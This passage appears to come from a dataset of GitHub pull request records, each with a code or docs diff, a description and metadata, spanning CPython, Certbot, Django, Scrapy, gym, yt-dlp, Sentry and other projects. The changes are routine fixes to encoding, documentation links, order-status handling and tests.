+ from default text encoding (e.g. :func:`locale.getpreferredencoding(False) <locale.getpreferredencoding>`)
+ to :term:`filesystem encoding and error handler`.
+ Argument files should be encoded in UTF-8 instead of ANSI Codepage on Windows.
+
Build Changes
=============
diff --git a/Lib/argparse.py b/Lib/argparse.py
index 1c5520c4b41bd1..02e98bbf920cf1 100644
--- a/Lib/argparse.py
+++ b/Lib/argparse.py
@@ -2161,7 +2161,9 @@ def _read_args_from_files(self, arg_strings):
# replace arguments referencing files with the file content
else:
try:
- with open(arg_string[1:]) as args_file:
+ with open(arg_string[1:],
+ encoding=_sys.getfilesystemencoding(),
+ errors=_sys.getfilesystemencodeerrors()) as args_file:
arg_strings = []
for arg_line in args_file.read().splitlines():
for arg in self.convert_arg_line_to_args(arg_line):
diff --git a/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst b/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst
new file mode 100644
index 00000000000000..4574264dd4d433
--- /dev/null
+++ b/Misc/NEWS.d/next/Library/2022-05-27-10-52-06.gh-issue-85308.K6r-tJ.rst
@@ -0,0 +1,4 @@
+Changed :class:`argparse.ArgumentParser` to use :term:`filesystem encoding
+and error handler` instead of default text encoding to read arguments from
+file (e.g. ``fromfile_prefix_chars`` option). This change affects Windows;
+argument file should be encoded with UTF-8 instead of ANSI Codepage.
| Fixes #85308 | https://api.github.com/repos/python/cpython/pulls/93277 | 2022-05-27T02:34:42Z | 2022-06-23T03:09:57Z | 2022-06-23T03:09:57Z | 2022-06-23T08:18:03Z | 1,036 | python/cpython | 3,944 |
Update docs link in certbot unsupported error | diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto
index 32eab52cdaa..56d9c65cf2a 100755
--- a/letsencrypt-auto-source/letsencrypt-auto
+++ b/letsencrypt-auto-source/letsencrypt-auto
@@ -930,7 +930,7 @@ else
error "Sorry, I don't know how to bootstrap Certbot on your operating system!"
error
error "You will need to install OS dependencies, configure virtualenv, and run pip install manually."
- error "Please see https://letsencrypt.readthedocs.org/en/latest/contributing.html#prerequisites"
+ error "Please see https://certbot.eff.org/docs/contributing.html#prerequisites"
error "for more info."
exit 1
}
diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template
index da8fabfeaf0..acdfcdb41cc 100755
--- a/letsencrypt-auto-source/letsencrypt-auto.template
+++ b/letsencrypt-auto-source/letsencrypt-auto.template
@@ -452,7 +452,7 @@ else
error "Sorry, I don't know how to bootstrap Certbot on your operating system!"
error
error "You will need to install OS dependencies, configure virtualenv, and run pip install manually."
- error "Please see https://letsencrypt.readthedocs.org/en/latest/contributing.html#prerequisites"
+ error "Please see https://certbot.eff.org/docs/contributing.html#prerequisites"
error "for more info."
exit 1
}
| ## Pull Request Checklist
- [ ] If the change being made is to a [distributed component](https://certbot.eff.org/docs/contributing.html#code-components-and-layout), edit the `master` section of `certbot/CHANGELOG.md` to include a description of the change being made.
- [ ] Include your name in `AUTHORS.md` if you like.
Minor change but it's been mentioned more than once so sending a PR. | https://api.github.com/repos/certbot/certbot/pulls/8168 | 2020-07-23T11:12:39Z | 2020-08-20T18:33:57Z | 2020-08-20T18:33:57Z | 2020-08-20T18:33:57Z | 370 | certbot/certbot | 2,318 |
Add Deezer to music APIs | diff --git a/README.md b/README.md
index b1224e0486..a92ea8748b 100644
--- a/README.md
+++ b/README.md
@@ -217,6 +217,7 @@ A collective list of JSON APIs for use in web development.
| Songsterr | Provides guitar, bass and drums tabs and chords | No | [Go!](https://www.songsterr.com/a/wa/api/) |
| Soundcloud | Music | No | [Go!](https://developers.soundcloud.com/) |
| Spotify | Music | Parts | [Go!](https://developer.spotify.com/web-api/) |
+| Deezer | Music | Yes | [Go!](http://developers.deezer.com/api) |
### Open Source projects
| https://api.github.com/repos/public-apis/public-apis/pulls/224 | 2016-10-04T22:17:18Z | 2016-10-06T07:55:37Z | 2016-10-06T07:55:37Z | 2016-10-06T07:55:40Z | 169 | public-apis/public-apis | 35,219 |
|
Fixed #31029 -- Used more specific links to RFCs. | diff --git a/docs/internals/contributing/writing-documentation.txt b/docs/internals/contributing/writing-documentation.txt
index 577a611d8dff8..299106345ee54 100644
--- a/docs/internals/contributing/writing-documentation.txt
+++ b/docs/internals/contributing/writing-documentation.txt
@@ -235,6 +235,10 @@ documentation:
Five
^^^^
+* Use :rst:role:`:rfc:<rfc>` to reference RFC and and try to link to the
+ relevant section if possible. For example, use ``:rfc:`2324#section-2.3.2```
+ or ``:rfc:`Custom link text <2324#section-2.3.2>```.
+
Django-specific markup
======================
diff --git a/docs/ref/csrf.txt b/docs/ref/csrf.txt
index e2f9d30703787..ee6d0643fefd6 100644
--- a/docs/ref/csrf.txt
+++ b/docs/ref/csrf.txt
@@ -298,10 +298,11 @@ This ensures that only forms that have originated from trusted domains can be
used to POST data back.
It deliberately ignores GET requests (and other requests that are defined as
-'safe' by :rfc:`7231`). These requests ought never to have any potentially
-dangerous side effects , and so a CSRF attack with a GET request ought to be
-harmless. :rfc:`7231` defines POST, PUT, and DELETE as 'unsafe', and all other
-methods are also assumed to be unsafe, for maximum protection.
+'safe' by :rfc:`7231#section-4.2.1`). These requests ought never to have any
+potentially dangerous side effects, and so a CSRF attack with a GET request
+ought to be harmless. :rfc:`7231#section-4.2.1` defines POST, PUT, and DELETE
+as 'unsafe', and all other methods are also assumed to be unsafe, for maximum
+protection.
The CSRF protection cannot protect against man-in-the-middle attacks, so use
:ref:`HTTPS <security-recommendation-ssl>` with
diff --git a/docs/ref/models/instances.txt b/docs/ref/models/instances.txt
index 5f8f389506e8d..9345bc0fe0bd6 100644
--- a/docs/ref/models/instances.txt
+++ b/docs/ref/models/instances.txt
@@ -755,8 +755,8 @@ track down every place that the URL might be created. Specify it once, in
.. note::
The string you return from ``get_absolute_url()`` **must** contain only
- ASCII characters (required by the URI specification, :rfc:`2396`) and be
- URL-encoded, if necessary.
+ ASCII characters (required by the URI specification, :rfc:`2396#section-2`)
+ and be URL-encoded, if necessary.
Code and templates calling ``get_absolute_url()`` should be able to use the
result directly without any further processing. You may wish to use the
diff --git a/docs/ref/request-response.txt b/docs/ref/request-response.txt
index a7e73ba1f518f..44d59b5f9a5d5 100644
--- a/docs/ref/request-response.txt
+++ b/docs/ref/request-response.txt
@@ -823,9 +823,9 @@ Methods
JavaScript from having access to the cookie.
HttpOnly_ is a flag included in a Set-Cookie HTTP response header. It's
- part of the :rfc:`6265` standard for cookies and can be a useful way to
- mitigate the risk of a client-side script accessing the protected cookie
- data.
+ part of the :rfc:`RFC 6265 <6265#section-4.1.2.6>` standard for cookies
+ and can be a useful way to mitigate the risk of a client-side script
+ accessing the protected cookie data.
* Use ``samesite='Strict'`` or ``samesite='Lax'`` to tell the browser not
to send this cookie when performing a cross-origin request. `SameSite`_
isn't supported by all browsers, so it's not a replacement for Django's
@@ -836,11 +836,11 @@ Methods
.. warning::
- :rfc:`6265` states that user agents should support cookies of at least
- 4096 bytes. For many browsers this is also the maximum size. Django
- will not raise an exception if there's an attempt to store a cookie of
- more than 4096 bytes, but many browsers will not set the cookie
- correctly.
+ :rfc:`RFC 6265 <6265#section-6.1>` states that user agents should
+ support cookies of at least 4096 bytes. For many browsers this is also
+ the maximum size. Django will not raise an exception if there's an
+ attempt to store a cookie of more than 4096 bytes, but many browsers
+ will not set the cookie correctly.
.. method:: HttpResponse.set_signed_cookie(key, value, salt='', max_age=None, expires=None, path='/', domain=None, secure=None, httponly=False, samesite=None)
diff --git a/docs/ref/settings.txt b/docs/ref/settings.txt
index d493b76aa0f55..e04d2118857e3 100644
--- a/docs/ref/settings.txt
+++ b/docs/ref/settings.txt
@@ -2759,7 +2759,7 @@ preference to the ``Host`` header. This should only be enabled if a proxy
which sets this header is in use.
This setting takes priority over :setting:`USE_X_FORWARDED_PORT`. Per
-:rfc:`7239#page-7`, the ``X-Forwarded-Host`` header can include the port
+:rfc:`7239#section-5.3`, the ``X-Forwarded-Host`` header can include the port
number, in which case you shouldn't use :setting:`USE_X_FORWARDED_PORT`.
.. setting:: USE_X_FORWARDED_PORT
@@ -3108,8 +3108,8 @@ Whether to use ``HttpOnly`` flag on the session cookie. If this is set to
cookie.
HttpOnly_ is a flag included in a Set-Cookie HTTP response header. It's part of
-the :rfc:`6265` standard for cookies and can be a useful way to mitigate the
-risk of a client-side script accessing the protected cookie data.
+the :rfc:`6265#section-4.1.2.6` standard for cookies and can be a useful way to
+mitigate the risk of a client-side script accessing the protected cookie data.
This makes it less trivial for an attacker to escalate a cross-site scripting
vulnerability into full hijacking of a user's session. There aren't many good
diff --git a/docs/ref/templates/builtins.txt b/docs/ref/templates/builtins.txt
index ea6ae5aeebf13..cc572583ee46a 100644
--- a/docs/ref/templates/builtins.txt
+++ b/docs/ref/templates/builtins.txt
@@ -1417,7 +1417,8 @@ Format character Description Example output
the "c" formatter will not add timezone
offset if value is a naive datetime
(see :class:`datetime.tzinfo`).
-``r`` :rfc:`5322` formatted date. ``'Thu, 21 Dec 2000 16:01:07 +0200'``
+``r`` :rfc:`RFC 5322 <5322#section-3.3>` ``'Thu, 21 Dec 2000 16:01:07 +0200'``
+ formatted date.
``U`` Seconds since the Unix Epoch
(January 1 1970 00:00:00 UTC).
================ ======================================== =====================
diff --git a/docs/ref/utils.txt b/docs/ref/utils.txt
index 33afbac36ae16..d8af302c0e40e 100644
--- a/docs/ref/utils.txt
+++ b/docs/ref/utils.txt
@@ -713,8 +713,8 @@ escaping HTML.
.. function:: http_date(epoch_seconds=None)
- Formats the time to match the :rfc:`1123` date format as specified by HTTP
- :rfc:`7231#section-7.1.1.1`.
+ Formats the time to match the :rfc:`1123#section-5.2.14` date format as
+ specified by HTTP :rfc:`7231#section-7.1.1.1`.
Accepts a floating point number expressed in seconds since the epoch in
UTC--such as that outputted by ``time.time()``. If set to ``None``,
diff --git a/docs/ref/validators.txt b/docs/ref/validators.txt
index 4fd2a37cbc161..7b7a184b1aa39 100644
--- a/docs/ref/validators.txt
+++ b/docs/ref/validators.txt
@@ -154,7 +154,8 @@ to, or in lieu of custom ``field.clean()`` methods.
an error code of ``'invalid'`` if it doesn't.
Loopback addresses and reserved IP spaces are considered valid. Literal
- IPv6 addresses (:rfc:`2732`) and unicode domains are both supported.
+ IPv6 addresses (:rfc:`3986#section-3.2.2`) and unicode domains are both
+ supported.
In addition to the optional arguments of its parent :class:`RegexValidator`
class, ``URLValidator`` accepts an extra optional attribute:
| ticket-31029 | https://api.github.com/repos/django/django/pulls/12142 | 2019-11-25T08:43:43Z | 2019-11-28T06:59:36Z | 2019-11-28T06:59:36Z | 2019-11-30T06:31:32Z | 2,154 | django/django | 51,395 |
update profiler docs again | diff --git a/selfdrive/debug/profiling/snapdragon/README.md b/selfdrive/debug/profiling/snapdragon/README.md
index 0bf6cd99e600dd..664814b6115273 100644
--- a/selfdrive/debug/profiling/snapdragon/README.md
+++ b/selfdrive/debug/profiling/snapdragon/README.md
@@ -3,11 +3,11 @@ snapdragon profiler
* download from https://developer.qualcomm.com/software/snapdragon-profiler/tools-archive (need a qc developer account)
- * choose v2021.5 (verified working with 20.04)
+ * choose v2021.5 (verified working with 20.04 dev environment)
* unzip to selfdrive/debug/profiling/snapdragon/SnapdragonProfiler
* run ```./setup-profiler.sh```
* run ```./setup-agnos.sh```
* run ```selfdrive/debug/adb.sh``` on device
-* run the ```adb connect xxx``` command that was given to you on local pc (if you changed adb path in previous step, run that version of adb)
+* run the ```adb connect xxx``` command that was given to you on local pc
* cd to SnapdragonProfiler and run ```./run_sdp.sh```
-* connect to device -> choose device you just setup
\ No newline at end of file
+* connect to device -> choose device you just setup
| https://api.github.com/repos/commaai/openpilot/pulls/30503 | 2023-11-20T21:27:48Z | 2023-11-20T21:30:17Z | 2023-11-20T21:30:17Z | 2023-11-20T21:30:18Z | 308 | commaai/openpilot | 8,928 |
|
Added xnxx.com's alternative domain support. | diff --git a/yt_dlp/extractor/xnxx.py b/yt_dlp/extractor/xnxx.py
index dd4fb54d463..27f99162778 100644
--- a/yt_dlp/extractor/xnxx.py
+++ b/yt_dlp/extractor/xnxx.py
@@ -13,7 +13,7 @@
class XNXXIE(InfoExtractor):
- _VALID_URL = r'https?://(?:video|www)\.xnxx\.com/video-?(?P<id>[0-9a-z]+)/'
+ _VALID_URL = r'https?://(?:video|www)\.xnxx3?\.com/video-?(?P<id>[0-9a-z]+)/'
_TESTS = [{
'url': 'http://www.xnxx.com/video-55awb78/skyrim_test_video',
'md5': '7583e96c15c0f21e9da3453d9920fbba',
@@ -32,6 +32,9 @@ class XNXXIE(InfoExtractor):
}, {
'url': 'http://www.xnxx.com/video-55awb78/',
'only_matching': True,
+ }, {
+ 'url': 'http://www.xnxx3.com/video-55awb78/',
+ 'only_matching': True,
}]
def _real_extract(self, url):
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Explanation of your *pull request* in arbitrary form goes here. Please make sure the description explains the purpose and effect of your *pull request* and is worded well enough to be understood. Provide as much context and examples as possible.
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/3188 | 2022-03-25T08:23:48Z | 2022-03-30T10:54:35Z | 2022-03-30T10:54:35Z | 2022-03-30T14:31:24Z | 316 | yt-dlp/yt-dlp | 7,413 |
Update together.ipynb | diff --git a/docs/examples/embeddings/together.ipynb b/docs/examples/embeddings/together.ipynb
index b468d5f4bacf1..210e79cea0187 100644
--- a/docs/examples/embeddings/together.ipynb
+++ b/docs/examples/embeddings/together.ipynb
@@ -11,9 +11,9 @@
"cell_type": "markdown",
"metadata": {},
"source": [
- "# Together.ai Embeddings -- \"m2-bert-80M-8k-retrieval\"\n",
+ "# Together AI Embeddings\n",
"\n",
- "This notebook shows how to user `Together.ai` for embeddings. Together.ai provides access to many state-of-the-art embedding models.\n",
+ "This notebook shows how to use `Together AI` for embeddings. Together AI provides access to many state-of-the-art embedding models.\n",
"\n",
"Visit https://together.ai and sign up to get an API key."
]
| # Description
Requesting to update the title and the company name.
Fixes # (issue)
## Type of Change
Please delete options that are not relevant.
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
# Suggested Checklist:
| https://api.github.com/repos/run-llama/llama_index/pulls/9975 | 2024-01-11T01:14:27Z | 2024-01-11T01:38:30Z | 2024-01-11T01:38:30Z | 2024-01-11T01:38:30Z | 221 | run-llama/llama_index | 6,660 |
gym.spaces.Dict inherits from collections.abc.Mapping | diff --git a/gym/spaces/dict.py b/gym/spaces/dict.py
index b7b7389573b..01cb7141842 100644
--- a/gym/spaces/dict.py
+++ b/gym/spaces/dict.py
@@ -1,9 +1,10 @@
from collections import OrderedDict
+from collections.abc import Mapping
import numpy as np
from .space import Space
-class Dict(Space):
+class Dict(Space, Mapping):
"""
A dictionary of simpler spaces.
@@ -116,9 +117,6 @@ def __iter__(self):
def __len__(self):
return len(self.spaces)
- def __contains__(self, item):
- return self.contains(item)
-
def __repr__(self):
return (
"Dict("
@@ -144,15 +142,3 @@ def from_jsonable(self, sample_n):
entry[key] = value[i]
ret.append(entry)
return ret
-
- def __eq__(self, other):
- return isinstance(other, Dict) and self.spaces == other.spaces
-
- def keys(self):
- return self.spaces.keys()
-
- def values(self):
- return self.spaces.values()
-
- def items(self):
- return self.spaces.items()
| It would be very convenient to have `gym.spaces.Dict` inheriting from `collections.abc.Mapping` so that it can be used in conjunction with [dmtree](https://github.com/deepmind/tree) to perform operations on complex spaces conveniently. It also simplifies the implementation which is good.
I just don't like the fact that the `__contains__` method behavior is not consistent with what it should be doing if it was a proper mapping but I don't think it is an issue.
Note that this patch is NOT removing any existing feature. So it should not break compatibility. | https://api.github.com/repos/openai/gym/pulls/2446 | 2021-10-14T10:21:23Z | 2021-10-17T01:22:30Z | 2021-10-17T01:22:30Z | 2021-10-26T00:48:06Z | 289 | openai/gym | 5,071 |
[MRG] DOC simplify extension docs | diff --git a/docs/topics/downloader-middleware.rst b/docs/topics/downloader-middleware.rst
index 614e4fff6d3..bff0d3e1c64 100644
--- a/docs/topics/downloader-middleware.rst
+++ b/docs/topics/downloader-middleware.rst
@@ -51,8 +51,8 @@ particular setting. See each middleware documentation for more info.
Writing your own downloader middleware
======================================
-Writing your own downloader middleware is easy. Each middleware component is a
-single Python class that defines one or more of the following methods:
+Each middleware component is a Python class that defines one or
+more of the following methods:
.. module:: scrapy.contrib.downloadermiddleware
diff --git a/docs/topics/extensions.rst b/docs/topics/extensions.rst
index 593a08ddc0b..c23e783bf12 100644
--- a/docs/topics/extensions.rst
+++ b/docs/topics/extensions.rst
@@ -5,7 +5,7 @@ Extensions
==========
The extensions framework provides a mechanism for inserting your own
-custom functionality into Scrapy.
+custom functionality into Scrapy.
Extensions are just regular classes that are instantiated at Scrapy startup,
when extensions are initialized.
@@ -75,14 +75,10 @@ included in the :setting:`EXTENSIONS_BASE` setting) you must set its order to
Writing your own extension
==========================
-Writing your own extension is easy. Each extension is a single Python class
-which doesn't need to implement any particular method.
-
-The main entry point for a Scrapy extension (this also includes middlewares and
-pipelines) is the ``from_crawler`` class method which receives a
-``Crawler`` instance which is the main object controlling the Scrapy crawler.
-Through that object you can access settings, signals, stats, and also control
-the crawler behaviour, if your extension needs to such thing.
+Each extension is a Python class. The main entry point for a Scrapy extension
+(this also includes middlewares and pipelines) is the ``from_crawler``
+class method which receives a ``Crawler`` instance. Through the Crawler object
+you can access settings, signals, stats, and also control the crawling behaviour.
Typically, extensions connect to :ref:`signals <topics-signals>` and perform
tasks triggered by them.
@@ -133,7 +129,7 @@ Here is the code of such extension::
crawler.signals.connect(ext.spider_closed, signal=signals.spider_closed)
crawler.signals.connect(ext.item_scraped, signal=signals.item_scraped)
- # return the extension object
+ # return the extension object
return ext
def spider_opened(self, spider):
@@ -183,12 +179,12 @@ Telnet console extension
~~~~~~~~~~~~~~~~~~~~~~~~
.. module:: scrapy.telnet
- :synopsis: Telnet console
+ :synopsis: Telnet console
.. class:: scrapy.telnet.TelnetConsole
Provides a telnet console for getting into a Python interpreter inside the
-currently running Scrapy process, which can be very useful for debugging.
+currently running Scrapy process, which can be very useful for debugging.
The telnet console must be enabled by the :setting:`TELNETCONSOLE_ENABLED`
setting, and the server will listen in the port specified in
diff --git a/docs/topics/item-pipeline.rst b/docs/topics/item-pipeline.rst
index 146f6cbcee1..9cd1989993d 100644
--- a/docs/topics/item-pipeline.rst
+++ b/docs/topics/item-pipeline.rst
@@ -23,8 +23,7 @@ Typical use for item pipelines are:
Writing your own item pipeline
==============================
-Writing your own item pipeline is easy. Each item pipeline component is a
-single Python class that must implement the following method:
+Each item pipeline component is a Python class that must implement the following method:
.. method:: process_item(item, spider)
diff --git a/docs/topics/spider-middleware.rst b/docs/topics/spider-middleware.rst
index 3df59998b91..92dc6ac4736 100644
--- a/docs/topics/spider-middleware.rst
+++ b/docs/topics/spider-middleware.rst
@@ -52,8 +52,8 @@ particular setting. See each middleware documentation for more info.
Writing your own spider middleware
==================================
-Writing your own spider middleware is easy. Each middleware component is a
-single Python class that defines one or more of the following methods:
+Each middleware component is a Python class that defines one or more of the
+following methods:
.. module:: scrapy.contrib.spidermiddleware
| In this PR I tried to remove some noise from the extension docs.
| https://api.github.com/repos/scrapy/scrapy/pulls/893 | 2014-09-20T18:20:56Z | 2014-10-21T19:13:59Z | 2014-10-21T19:13:59Z | 2014-10-21T19:13:59Z | 1,010 | scrapy/scrapy | 34,969 |
acme: use order "status" to determine action during finalization | diff --git a/acme/acme/client.py b/acme/acme/client.py
index b5021b44726..aa7085fb0c0 100644
--- a/acme/acme/client.py
+++ b/acme/acme/client.py
@@ -797,9 +797,13 @@ def finalize_order(self, orderr: messages.OrderResource, deadline: datetime.date
time.sleep(1)
response = self._post_as_get(orderr.uri)
body = messages.Order.from_json(response.json())
- if body.error is not None:
- raise errors.IssuanceError(body.error)
- if body.certificate is not None:
+ if body.status == messages.STATUS_INVALID:
+ if body.error is not None:
+ raise errors.IssuanceError(body.error)
+ raise errors.Error(
+ "The certificate order failed. No further information was provided "
+ "by the server.")
+ elif body.status == messages.STATUS_VALID and body.certificate is not None:
certificate_response = self._post_as_get(body.certificate)
orderr = orderr.update(body=body, fullchain_pem=certificate_response.text)
if fetch_alternative_chains:
diff --git a/acme/tests/client_test.py b/acme/tests/client_test.py
index 2eeceee18e1..27cb49a9e90 100644
--- a/acme/tests/client_test.py
+++ b/acme/tests/client_test.py
@@ -822,7 +822,8 @@ def test_poll_authorizations_success(self):
def test_finalize_order_success(self):
updated_order = self.order.update(
- certificate='https://www.letsencrypt-demo.org/acme/cert/')
+ certificate='https://www.letsencrypt-demo.org/acme/cert/',
+ status=messages.STATUS_VALID)
updated_orderr = self.orderr.update(body=updated_order, fullchain_pem=CERT_SAN_PEM)
self.response.json.return_value = updated_order.to_json()
@@ -832,12 +833,22 @@ def test_finalize_order_success(self):
self.assertEqual(self.client.finalize_order(self.orderr, deadline), updated_orderr)
def test_finalize_order_error(self):
- updated_order = self.order.update(error=messages.Error.with_code('unauthorized'))
+ updated_order = self.order.update(
+ error=messages.Error.with_code('unauthorized'),
+ status=messages.STATUS_INVALID)
self.response.json.return_value = updated_order.to_json()
deadline = datetime.datetime(9999, 9, 9)
self.assertRaises(errors.IssuanceError, self.client.finalize_order, self.orderr, deadline)
+ def test_finalize_order_invalid_status(self):
+ # https://github.com/certbot/certbot/issues/9296
+ order = self.order.update(error=None, status=messages.STATUS_INVALID)
+ self.response.json.return_value = order.to_json()
+ with self.assertRaises(errors.Error) as error:
+ self.client.finalize_order(self.orderr, datetime.datetime(9999, 9, 9))
+ self.assertIn("The certificate order failed", str(error.exception))
+
def test_finalize_order_timeout(self):
deadline = datetime.datetime.now() - datetime.timedelta(seconds=60)
self.assertRaises(errors.TimeoutError, self.client.finalize_order, self.orderr, deadline)
@@ -845,6 +856,7 @@ def test_finalize_order_timeout(self):
def test_finalize_order_alt_chains(self):
updated_order = self.order.update(
certificate='https://www.letsencrypt-demo.org/acme/cert/',
+ status=messages.STATUS_VALID
)
updated_orderr = self.orderr.update(body=updated_order,
fullchain_pem=CERT_SAN_PEM,
diff --git a/certbot/CHANGELOG.md b/certbot/CHANGELOG.md
index ba307eae631..ba45d46e40a 100644
--- a/certbot/CHANGELOG.md
+++ b/certbot/CHANGELOG.md
@@ -10,7 +10,9 @@ Certbot adheres to [Semantic Versioning](https://semver.org/).
### Changed
-*
+* A change to order finalization has been made to the `acme` module and Certbot:
+ - An order's `certificate` field will only be processed if the order's `status` is `valid`.
+ - An order's `error` field will only be processed if the order's `status` is `invalid`.
### Fixed
| Rather than deducing the status of an order by the "certificate"
and "error" fields, use the "status" field directly.
----
Fixes #9296.
| https://api.github.com/repos/certbot/certbot/pulls/9297 | 2022-05-10T11:46:56Z | 2022-05-13T16:51:11Z | 2022-05-13T16:51:11Z | 2022-05-13T16:51:14Z | 976 | certbot/certbot | 96 |
fix(tests) Clean up tests that were used to debug snuba inconsistency | diff --git a/tests/snuba/api/endpoints/test_organization_events_v2.py b/tests/snuba/api/endpoints/test_organization_events_v2.py
index f819165dab6a1..0ab0949f0b6d9 100644
--- a/tests/snuba/api/endpoints/test_organization_events_v2.py
+++ b/tests/snuba/api/endpoints/test_organization_events_v2.py
@@ -1,7 +1,6 @@
from __future__ import absolute_import
import six
-import pytest
import random
import mock
@@ -2517,24 +2516,26 @@ def test_messed_up_function_values(self):
data = response.data["data"]
assert len(data) == 0
- def test_context_fields(self):
+ def test_context_fields_between_datasets(self):
self.login_as(user=self.user)
project = self.create_project()
- data = load_data("android")
+ event_data = load_data("android")
transaction_data = load_data("transaction")
- data["spans"] = transaction_data["spans"]
- data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
- data["type"] = "transaction"
- data["transaction"] = "/failure_rate/1"
- data["timestamp"] = iso_format(before_now(minutes=1))
- data["start_timestamp"] = iso_format(before_now(minutes=1, seconds=5))
- data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
- data["contexts"]["http"] = {
+ event_data["spans"] = transaction_data["spans"]
+ event_data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
+ event_data["type"] = "transaction"
+ event_data["transaction"] = "/failure_rate/1"
+ event_data["timestamp"] = iso_format(before_now(minutes=1))
+ event_data["start_timestamp"] = iso_format(before_now(minutes=1, seconds=5))
+ event_data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
+ event_data["contexts"]["http"] = {
"method": "GET",
"referer": "something.something",
"url": "https://areyouasimulation.com",
}
- self.store_event(data, project_id=project.id)
+ self.store_event(event_data, project_id=project.id)
+ event_data["type"] = "error"
+ self.store_event(event_data, project_id=project.id)
fields = [
"http.method",
@@ -2555,99 +2556,24 @@ def test_context_fields(self):
"device.uuid",
]
- with self.feature("organizations:discover-basic"):
- response = self.client.get(
- self.url,
- format="json",
- data={"field": fields + ["count()"], "query": "event.type:transaction"},
- )
-
- assert response.status_code == 200, response.content
- assert len(response.data["data"]) == 1
- results = response.data["data"]
-
- for field in fields:
- key, value = field.split(".", 1)
- expected = data["contexts"][key][value]
-
- # TODO (evanh) There is a bug in snuba right now where if a promoted column is used for a boolean
- # value, it returns "1" or "0" instead of "True" and "False" (not that those make more sense)
- if expected in (True, False):
- expected = six.text_type(expected)
- # All context columns are treated as strings, regardless of the type of data they stored.
- elif isinstance(expected, six.integer_types):
- expected = "{:g}".format(expected)
-
- assert results[0][field] == expected
- assert results[0]["count"] == 1
-
- @pytest.mark.xfail(reason="these fields behave differently between the types of events")
- def test_context_fields_in_errors(self):
- self.login_as(user=self.user)
- project = self.create_project()
- data = load_data("android")
- transaction_data = load_data(
- "transaction",
- timestamp=before_now(minutes=1),
- start_timestamp=before_now(minutes=1, seconds=5),
- )
- data["spans"] = transaction_data["spans"]
- data["contexts"]["trace"] = transaction_data["contexts"]["trace"]
- data["type"] = "error"
- data["transaction"] = "/failure_rate/1"
- data["user"]["geo"] = {"country_code": "US", "region": "CA", "city": "San Francisco"}
- data["contexts"]["http"] = {
- "method": "GET",
- "referer": "something.something",
- "url": "https://areyouasimulation.com",
- }
- self.store_event(data, project_id=project.id)
-
- fields = [
- "http.method",
- "http.referer",
- "http.url",
- "os.build",
- "os.kernel_version",
- "device.arch",
- "device.battery_level",
- "device.brand",
- "device.charging",
- "device.locale",
- "device.model_id",
- "device.name",
- "device.online",
- "device.orientation",
- "device.simulator",
- "device.uuid",
+ data = [
+ {"field": fields + ["location", "count()"], "query": "event.type:error"},
+ {"field": fields + ["duration", "count()"], "query": "event.type:transaction"},
]
- with self.feature("organizations:discover-basic"):
- response = self.client.get(
- self.url,
- format="json",
- data={"field": fields + ["count()"], "query": "event.type:error"},
- )
-
- assert response.status_code == 200, response.content
- assert len(response.data["data"]) == 1
- results = response.data["data"]
-
- for field in fields:
- key, value = field.split(".", 1)
- expected = data["contexts"][key][value]
-
- # TODO (evanh) There is a bug in snuba right now where if a promoted column is used for a boolean
- # value, it returns "1" or "0" instead of "True" and "False" (not that those make more sense)
- if expected in (True, False):
- expected = six.text_type(expected)
- # All context columns are treated as strings, regardless of the type of data they stored.
- elif isinstance(expected, six.integer_types):
- expected = "{:.1f}".format(expected)
-
- assert results[0][field] == expected
+ for datum in data:
+ with self.feature("organizations:discover-basic"):
+ response = self.client.get(self.url, format="json", data=datum)
- assert results[0]["count"] == 1
+ assert response.status_code == 200, response.content
+ assert len(response.data["data"]) == 1, datum
+ results = response.data["data"]
+ assert results[0]["count"] == 1, datum
+
+ for field in fields:
+ key, value = field.split(".", 1)
+ expected = six.text_type(event_data["contexts"][key][value])
+ assert results[0][field] == expected, field + six.text_type(datum)
def test_histogram_function(self):
self.login_as(user=self.user)
| These tests were originally put in place to debug the issue solved by
https://github.com/getsentry/snuba/pull/846. I left the tests in just to catch
any possible regressions. | https://api.github.com/repos/getsentry/sentry/pulls/20172 | 2020-08-11T15:57:07Z | 2020-08-12T16:06:52Z | 2020-08-12T16:06:52Z | 2020-12-18T13:00:38Z | 1,692 | getsentry/sentry | 43,824 |
Handle empty message tree state | diff --git a/website/src/components/Stats/Stats.tsx b/website/src/components/Stats/Stats.tsx
index f12cafa609..39755d9d33 100644
--- a/website/src/components/Stats/Stats.tsx
+++ b/website/src/components/Stats/Stats.tsx
@@ -30,6 +30,11 @@ export const Stats = ({ data }: StatsProps) => {
const messageTreeStats = getStatByName("message_trees_states_by_lang");
+ // this will be empty on a fresh db:
+ if (!messageTreeStats) {
+ return null;
+ }
+
return (
<>
<Heading size="lg" className="pb-4">
